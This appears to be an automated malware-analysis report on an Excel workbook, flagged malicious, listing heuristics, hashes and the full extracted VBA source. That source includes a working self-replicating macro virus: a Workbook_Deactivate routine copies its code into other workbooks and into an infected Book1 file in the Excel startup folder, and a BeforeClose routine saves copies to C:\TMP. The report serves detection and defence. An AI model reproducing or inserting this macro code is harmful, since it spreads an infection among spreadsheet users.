Verdict: MALICIOUS
Risk Score: 288
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1547.001 Registry Run Keys / Startup Folder
- T1137.001 DLL Search Order Hijacking
This XLSX file contains VBA macros that exhibit self-replication behavior and attempt to establish persistence. The Workbook_Deactivate subroutine copies the ThisWorkbook code module into the active workbook and into a new workbook that it saves to the Excel startup folder, specifically targeting 'Application.StartupPath + "\Book1."'. The Workbook_BeforeClose subroutine also saves a copy of the workbook to 'C:\TMP\'. ClamAV detections confirm this is a known malicious macro variant.
Heuristics (6)
- ClamAV: Xls.Malware.Emeka-10012113-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Emeka-10012113-0
- VBA project inside OOXML (medium, OOXML_VBA, 3 related findings): Document contains a VBA project; VBA macros present
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: `w2.InsertLines 1, w1.Lines(1, w1.CountOfLines)`
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script: `Set xlApp = CreateObject("Excel.Application")`
- VBA copies the workbook into the Excel XLSTART startup folder (high, OLE_VBA_XLSTART_PERSISTENCE): The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
  Matched line in script: `xlWB.SaveAs Filename:=Application.StartupPath + "\Book1.", FileFormat:=xlNormal, AddToMru:=False`
- External workbook data link (low, OOXML_EXTERNAL_REL_DATALINK): External workbook reference in xl/externalLinks/_rels/externalLink1.xml.rels: \Desktop\QBR\1-7\各店报表\2022年1QBR_V2_MC0032S昆明合达.xlsx
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10362 bytes | 1f280b7c7a0bdac562101faf97ed8244fb9feab89b1a783410bdd9a3464186b0 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'OOO
''Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
''If UCase(ThisWorkbook.Name) = "BOOK1" Then
''Application.Dialogs(xlDialogSaveAs).Show
'Cancel = True
''End If
''End Sub
Private Sub Workbook_Deactivate()
On Error Resume Next
Set w1 = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
Set w2 = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
If w2.Lines(1, 1) <> "'OOO" Then
w2.InsertLines 1, w1.Lines(1, w1.CountOfLines)
End If
If UCase(Dir(Application.StartupPath + "\book1.")) <> "BOOK1" Then
Set xlApp = CreateObject("Excel.Application")
Set xlWB = xlApp.Workbooks.Add
Set xlWS = xlWB.Sheets.Add
Set xlCM = xlWB.VBProject.VBComponents("ThisWorkbook").CodeModule
xlCM.InsertLines 1, w1.Lines(1, w1.CountOfLines)
xlWB.SaveAs Filename:=Application.StartupPath + "\Book1.", FileFormat:=xlNormal, AddToMru:=False
xlWB.Close
xlApp.Quit
End If
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
On Error Resume Next
TmpDir = "C:\TMP\"
If Trim(Dir(TmpDir)) = "" Then
MkDir TmpDir
End If
oldname = ThisWorkbook.Name
mFileName = "C:\TMP\" + oldname
ThisWorkbook.SaveCopyAs Filename:=mFileName
End Sub
Sub vtHideRow()
Application.Selection.EntireRow.Hidden = True
End Sub
Sub vtShowRow()
Application.Selection.EntireRow.Hidden = False
End Sub
Sub vtShowCol()
Application.Selection.EntireColumn.Hidden = False
End Sub
'Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
'Sheets("ES Cover").Select
'Sheets("Financials").Range("AY3").Value = "FALSE"
'MsgBox "The workbook will be saved in constant USD"
'End Sub
'Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
'Sheets("ES Cover").Select
'Sheets("Financials").Range("AY3").Value = "FALSE"
'MsgBox "The workbook will be saved in constant USD"
'End Sub
Function WorksheetExists(WSName As String, _
Optional WB As Workbook = Nothing) As Boolean
On Error Resume Next
WorksheetExists = CBool(Len(IIf(WB Is Nothing, _
ThisWorkbook, WB).Worksheets(WSName).Name))
End Function
Private Sub Workbook_NewSheet(ByVal Sh As Object)
Application.DisplayAlerts = False
Application.ScreenUpdating = False
If WorksheetExists("Drill") = True Then ' check whether a given sheet exists; a fairly quick method
Sheets("Drill").Delete
End If
ActiveSheet.Name = "Drill"
Columns("A:B").Delete
With ActiveSheet.UsedRange.Columns("I").Cells
.TextToColumns Destination:=.Cells(1), DataType:=xlFixedWidth, FieldInfo:=Array(0, xlYMDFormat)
.NumberFormat = "m/d/yyyy" 'change to any date-based number format you prefer the cells to display
End With
Columns("A:T").AutoFit
Columns("N:T").NumberFormat = "#,##0.00_ ;[Red]-#,##0.00 "
If Worksheets("Directions").Range("D1").Value <> "" Then
ActiveSheet.ListObjects(1).Range.AutoFilter Field:=ActiveSheet.ListObjects(1).ListColumns(Worksheets("Directions").Range("D1").Value).Index, Criteria1:="<>"
End If
Range("A1:T" & Range("A" & Rows.Count).End(xlUp).Row).Sort key1:="Dept", Order1:=xlAscending, key2:="Journal Date", Order2:=xlAscending, Header:=xlYes, key3:="Invoice Date", Order3:=xlAscending
ActiveSheet.PageSetup.PrintArea = ActiveCell.CurrentRegion.Address
With ActiveSheet.PageSetup
.Orientation = xlLandscape
.Zoom = False
.FitToPagesTall = 1
.FitToPagesWide = 1
End With
Range("A1").Select
Worksheets("Directions").Range("D1").ClearContents
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub
'Private Sub Workbook_SheetPivotTableUpdate(ByVal Sh As Object, ByVal Target As PivotTable)
'Dim answer As String
'Dim COUNT As Integer
'Range("C6").Select
'If Range("B2") = "General and Administrative" Then
' Range("A500").Select
' answer = InputBox("Please enter password", "Access Restricted!!")
' If answer <> "tyrone" Then
' Range("B2") = "Rooms"
' Range("C6").Select
' MsgBox ("Invalid Password!")
' End If
' answer = "0"
' Range("C6").Select
'End If
'End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "模块1"
Sub 数据通用提取()
Application.DisplayAlerts = False
Application.ScreenUpdating = False
Dim DQwj As Workbook, SJwj As Workbook
Dim BYmc As String, WJmc As String, GSmc As String
Dim WJsl As Integer, QShs As Integer
Dim BBrq As String
Dim FK As String
On Error GoTo line
Set DQwj = ThisWorkbook
BBrq = Range("B6")
BYmc = Range("B8")
WJsl = Range("B9")
QShs = Range("B10") - 1
For i = 1 To WJsl
WJmc = Cells(i + QShs, 3)
GSmc = Cells(i + QShs, 2)
Set SJwj = Application.Workbooks.Open(WJmc, UpdateLinks = 0) 'DQwj.Path
Sheets(BYmc).Activate
Cells.Select
Selection.Copy
DQwj.Activate
Sheets(GSmc).Activate
Range("A1").Select
Selection.PasteSpecial Paste:=xlPasteValues, Operation:=xlNone, SkipBlanks:=False, Transpose:=False
SJwj.Sheets(BYmc).Activate
Cells.Select
Selection.Copy
DQwj.Activate
Sheets(GSmc).Activate
Cells.Select
Selection.PasteSpecial Paste:=xlPasteFormats, Operation:=xlNone, SkipBlanks:=False, Transpose:=False
DQwj.Sheets("提取页面").Activate
Range("A1").Select
' Cells.Copy
' DQwj.Activate
' Sheets(GSmc).Activate
' Cells.Select
' ActiveSheet.Paste
' Range("A1").Select
SJwj.Close False
line1:
Sheets(1).Select
Next
Calculate
MsgBox "数据提取完毕,以下公司提取报错!" & Chr(13) & FK
Application.CutCopyMode = False
Application.ScreenUpdating = True
Application.DisplayAlerts = True
Exit Sub
line:
FK = FK & GSmc & Chr(13)
Err.Clear
Resume line1
End Sub
Sub 表页生成()
Application.DisplayAlerts = False
Application.ScreenUpdating = False
Dim WJmc As String
Dim WJsl As Integer, QShs As Integer
WJsl = Range("B9")
QShs = Range("B10")
For i = 1 To WJsl
Sheets(1).Select
WJmc = Cells(i + QShs - 1, 2)
Sheets.Add After:=ActiveSheet
Sheets(2).Name = WJmc
Next
Sheets(1).Select
Application.ScreenUpdating = True
Application.DisplayAlerts = True
End Sub
Sub 表页清空()
Application.DisplayAlerts = False
Dim i As Integer, j As Integer
Sheets(1).Select
j = Sheets.Count - 1
For i = 1 To j
Sheets(2).Delete
Next
End Sub
Attribute VB_Name = "模块2"
Sub 复制路径()
Range("B3").Value = Range("B2")
End Sub
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet9"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet10"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 43520 bytes | 6b21494d2119a57f601987771c83d9e15704d0b3340dca128733615d1f8b9261 |
Detection
- ClamAV: Xls.Malware.Emeka-10012113-0
- Obfuscation or payload: unlikely